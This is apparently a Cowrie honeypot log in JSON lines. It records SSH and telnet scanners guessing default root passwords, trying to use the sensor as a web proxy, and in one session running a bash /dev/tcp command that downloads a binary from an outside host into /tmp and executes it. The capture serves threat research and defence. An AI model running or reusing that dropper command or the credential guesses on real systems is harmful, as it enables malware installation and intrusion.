{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T17:00:35.180333Z","src_ip":"212.227.235.229","session":"4bedc3cdb555"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:00:35.658829Z","src_ip":"212.227.235.229","session":"4bedc3cdb555"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T17:00:35.819167Z","session":"4bedc3cdb555"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:01:45.019970Z","src_ip":"212.227.235.229","session":"4bedc3cdb555"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:02:05.264849Z","src_ip":"212.227.125.160","session":"1f7c876642cc"}
{"eventid":"cowrie.session.closed","duration":180.19487762451172,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:02:05.271807Z","src_ip":"212.227.125.160","session":"1f7c876642cc"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53120,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fa3bcd616be","protocol":"ssh","message":"New connection: 217.72.205.35:53120 (1.2.3.4:22) [session: 1fa3bcd616be]","sensor":"my-vps","timestamp":"2025-09-08T17:02:52.766936Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:02:52.768317Z","src_ip":"217.72.205.35","session":"1fa3bcd616be"}
{"eventid":"cowrie.session.connect","src_ip":"193.105.134.95","src_port":44912,"dst_ip":"1.2.3.4","dst_port":22,"session":"3613971f146c","protocol":"ssh","message":"New connection: 193.105.134.95:44912 (1.2.3.4:22) [session: 3613971f146c]","sensor":"my-vps","timestamp":"2025-09-08T17:03:11.216868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-WinSCP_release_5.2.7","message":"Remote SSH version: SSH-2.0-WinSCP_release_5.2.7","sensor":"my-vps","timestamp":"2025-09-08T17:03:11.217543Z","src_ip":"193.105.134.95","session":"3613971f146c"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-09-08T17:03:11.262379Z","src_ip":"193.105.134.95","session":"3613971f146c"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:03:12.183070Z","src_ip":"193.105.134.95","session":"3613971f146c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"193.105.134.95","src_port":22029,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:22029","sensor":"my-vps","timestamp":"2025-09-08T17:03:12.228683Z","session":"3613971f146c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T17:03:12.273484Z","src_ip":"193.105.134.95","session":"3613971f146c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":7757,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:7757","sensor":"my-vps","timestamp":"2025-09-08T17:03:12.403082Z","session":"3613971f146c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T17:03:12.447981Z","src_ip":"193.105.134.95","session":"3613971f146c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"193.105.134.95","src_port":15058,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:15058","sensor":"my-vps","timestamp":"2025-09-08T17:03:12.579091Z","session":"3613971f146c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T17:03:12.623854Z","src_ip":"193.105.134.95","session":"3613971f146c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"193.105.134.95","src_port":19062,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:19062","sensor":"my-vps","timestamp":"2025-09-08T17:03:12.755064Z","session":"3613971f146c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T17:03:12.799989Z","src_ip":"193.105.134.95","session":"3613971f146c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"193.105.134.95","src_port":7309,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:7309","sensor":"my-vps","timestamp":"2025-09-08T17:03:12.931058Z","session":"3613971f146c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T17:03:12.976075Z","src_ip":"193.105.134.95","session":"3613971f146c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"193.105.134.95","src_port":8654,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:8654","sensor":"my-vps","timestamp":"2025-09-08T17:03:13.107231Z","session":"3613971f146c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T17:03:13.152077Z","src_ip":"193.105.134.95","session":"3613971f146c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:03:13.197829Z","src_ip":"193.105.134.95","session":"3613971f146c"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":54564,"dst_ip":"1.2.3.4","dst_port":22,"session":"38edbbe3beff","protocol":"ssh","message":"New connection: 8.138.136.155:54564 (1.2.3.4:22) [session: 38edbbe3beff]","sensor":"my-vps","timestamp":"2025-09-08T17:04:01.515629Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T17:04:01.516880Z","src_ip":"8.138.136.155","session":"38edbbe3beff"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T17:04:01.517343Z","src_ip":"8.138.136.155","session":"38edbbe3beff"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T17:04:02.215191Z","src_ip":"8.138.136.155","session":"38edbbe3beff"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:04:03.436073Z","src_ip":"8.138.136.155","session":"38edbbe3beff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T17:04:03.927778Z","src_ip":"8.138.136.155","session":"38edbbe3beff"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T17:04:03.929839Z","src_ip":"8.138.136.155","session":"38edbbe3beff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32776,"dst_ip":"1.2.3.4","dst_port":23,"session":"17ce913c149d","protocol":"telnet","message":"New connection: 212.227.125.160:32776 (1.2.3.4:23) [session: 17ce913c149d]","sensor":"my-vps","timestamp":"2025-09-08T17:04:05.705583Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:04:05.788569Z","src_ip":"212.227.125.160","session":"17ce913c149d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T17:04:05.805444Z","src_ip":"212.227.125.160","session":"17ce913c149d"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-08T17:04:05.806626Z","src_ip":"212.227.125.160","session":"17ce913c149d"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-08T17:04:05.807378Z","src_ip":"212.227.125.160","session":"17ce913c149d"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/0oZgCqA650 && chmod +x /tmp/0oZgCqA650 && /tmp/0oZgCqA650 wkfLwzLcxEmxtlfd1TLXxVeyt1/T3DLU3Va3t0nC1TDDwVG5tVfC3TfNwlG7rVbC1C7cxFStt1/J2zDcx1Wju0nC3jjDwlS1rVbG2Drbw1aystOaO8/cIsj9UF1U\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/0oZgCqA650 && chmod +x /tmp/0oZgCqA650 && /tmp/0oZgCqA650 wkfLwzLcxEmxtlfd1TLXxVeyt1/T3DLU3Va3t0nC1TDDwVG5tVfC3TfNwlG7rVbC1C7cxFStt1/J2zDcx1Wju0nC3jjDwlS1rVbG2Drbw1aystOaO8/cIsj9UF1U\" &","sensor":"my-vps","timestamp":"2025-09-08T17:04:10.162025Z","src_ip":"8.138.136.155","session":"38edbbe3beff"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/JPj3hVvn0l","message":"CMD: head -c 1458464 > /tmp/JPj3hVvn0l","sensor":"my-vps","timestamp":"2025-09-08T17:04:10.165315Z","src_ip":"8.138.136.155","session":"38edbbe3beff"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T17:04:10.396226Z","src_ip":"8.138.136.155","session":"38edbbe3beff"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T17:04:10.400900Z","src_ip":"8.138.136.155","session":"38edbbe3beff"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T17:04:10.404337Z","src_ip":"8.138.136.155","session":"38edbbe3beff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4fb0c26712d29e0d94188ce593d625cb4f43e2f1e81a5af0d5bbda10628fd301","size":1928,"shasum":"4fb0c26712d29e0d94188ce593d625cb4f43e2f1e81a5af0d5bbda10628fd301","duplicate":false,"duration":"6.5","message":"Closing TTY Log: var/lib/cowrie/tty/4fb0c26712d29e0d94188ce593d625cb4f43e2f1e81a5af0d5bbda10628fd301 after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:04:10.405700Z","src_ip":"8.138.136.155","session":"38edbbe3beff"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:04:10.407053Z","src_ip":"8.138.136.155","session":"38edbbe3beff"}
{"eventid":"cowrie.session.connect","src_ip":"186.155.193.17","src_port":54134,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a50653f0908","protocol":"ssh","message":"New connection: 186.155.193.17:54134 (1.2.3.4:22) [session: 4a50653f0908]","sensor":"my-vps","timestamp":"2025-09-08T17:06:02.369515Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh-0.3.0","message":"Remote SSH version: SSH-2.0-libssh-0.3.0","sensor":"my-vps","timestamp":"2025-09-08T17:06:02.542189Z","src_ip":"186.155.193.17","session":"4a50653f0908"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:06:02.716435Z","src_ip":"186.155.193.17","session":"4a50653f0908"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:07:05.808307Z","src_ip":"212.227.125.160","session":"17ce913c149d"}
{"eventid":"cowrie.session.closed","duration":180.10556149482727,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:07:05.811034Z","src_ip":"212.227.125.160","session":"17ce913c149d"}
{"eventid":"cowrie.session.connect","src_ip":"206.168.34.68","src_port":46250,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a06bd436552","protocol":"ssh","message":"New connection: 206.168.34.68:46250 (1.2.3.4:22) [session: 9a06bd436552]","sensor":"my-vps","timestamp":"2025-09-08T17:08:10.079086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:08:10.177501Z","src_ip":"206.168.34.68","session":"9a06bd436552"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-09-08T17:08:10.300471Z","src_ip":"206.168.34.68","session":"9a06bd436552"}
{"eventid":"cowrie.session.closed","duration":"15.1","message":"Connection lost after 15.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:08:25.181924Z","src_ip":"206.168.34.68","session":"9a06bd436552"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58114,"dst_ip":"1.2.3.4","dst_port":22,"session":"77c9a8e2ff27","protocol":"ssh","message":"New connection: 217.72.205.35:58114 (1.2.3.4:22) [session: 77c9a8e2ff27]","sensor":"my-vps","timestamp":"2025-09-08T17:09:25.730218Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:09:25.731461Z","src_ip":"217.72.205.35","session":"77c9a8e2ff27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65105,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e8431e552e3","protocol":"ssh","message":"New connection: 212.227.235.229:65105 (1.2.3.4:22) [session: 5e8431e552e3]","sensor":"my-vps","timestamp":"2025-09-08T17:11:41.043463Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:11:41.152261Z","src_ip":"212.227.235.229","session":"5e8431e552e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54007,"dst_ip":"1.2.3.4","dst_port":22,"session":"168ca5069b15","protocol":"ssh","message":"New connection: 212.227.235.229:54007 (1.2.3.4:22) [session: 168ca5069b15]","sensor":"my-vps","timestamp":"2025-09-08T17:14:19.947029Z"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:14:20.433434Z","src_ip":"212.227.235.229","session":"168ca5069b15"}
{"eventid":"cowrie.session.connect","src_ip":"186.155.193.17","src_port":54766,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae84ff4adb8b","protocol":"ssh","message":"New connection: 186.155.193.17:54766 (1.2.3.4:22) [session: ae84ff4adb8b]","sensor":"my-vps","timestamp":"2025-09-08T17:14:22.484573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh-0.7.3","message":"Remote SSH version: SSH-2.0-libssh-0.7.3","sensor":"my-vps","timestamp":"2025-09-08T17:14:22.663396Z","src_ip":"186.155.193.17","session":"ae84ff4adb8b"}
{"eventid":"cowrie.client.kex","hassh":"c8c5fbf80b7b0a1b0e4de5e683f3c5ad","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,blowfish-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","blowfish-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c8c5fbf80b7b0a1b0e4de5e683f3c5ad","sensor":"my-vps","timestamp":"2025-09-08T17:14:22.844414Z","src_ip":"186.155.193.17","session":"ae84ff4adb8b"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-09-08T17:14:25.509645Z","src_ip":"186.155.193.17","session":"ae84ff4adb8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56518,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d65206d019a","protocol":"ssh","message":"New connection: 212.227.235.229:56518 (1.2.3.4:22) [session: 7d65206d019a]","sensor":"my-vps","timestamp":"2025-09-08T17:14:25.647817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.7.4","message":"Remote SSH version: SSH-2.0-libssh_0.7.4","sensor":"my-vps","timestamp":"2025-09-08T17:14:25.678189Z","src_ip":"212.227.235.229","session":"7d65206d019a"}
{"eventid":"cowrie.client.kex","hassh":"e37f354a101aff5871ba233aa82b84ec","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e37f354a101aff5871ba233aa82b84ec","sensor":"my-vps","timestamp":"2025-09-08T17:14:26.380226Z","src_ip":"212.227.235.229","session":"7d65206d019a"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:14:26.690340Z","src_ip":"186.155.193.17","session":"ae84ff4adb8b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:14:27.861009Z","src_ip":"212.227.235.229","session":"7d65206d019a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55336,"dst_ip":"1.2.3.4","dst_port":23,"session":"7af708cb49a1","protocol":"telnet","message":"New connection: 212.227.125.160:55336 (1.2.3.4:23) [session: 7af708cb49a1]","sensor":"my-vps","timestamp":"2025-09-08T17:15:14.238293Z"}
{"eventid":"cowrie.session.closed","duration":1.8430886268615723,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:15:16.081292Z","src_ip":"212.227.125.160","session":"7af708cb49a1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58286,"dst_ip":"1.2.3.4","dst_port":22,"session":"128c6816ec6a","protocol":"ssh","message":"New connection: 217.72.205.35:58286 (1.2.3.4:22) [session: 128c6816ec6a]","sensor":"my-vps","timestamp":"2025-09-08T17:16:15.868866Z"}
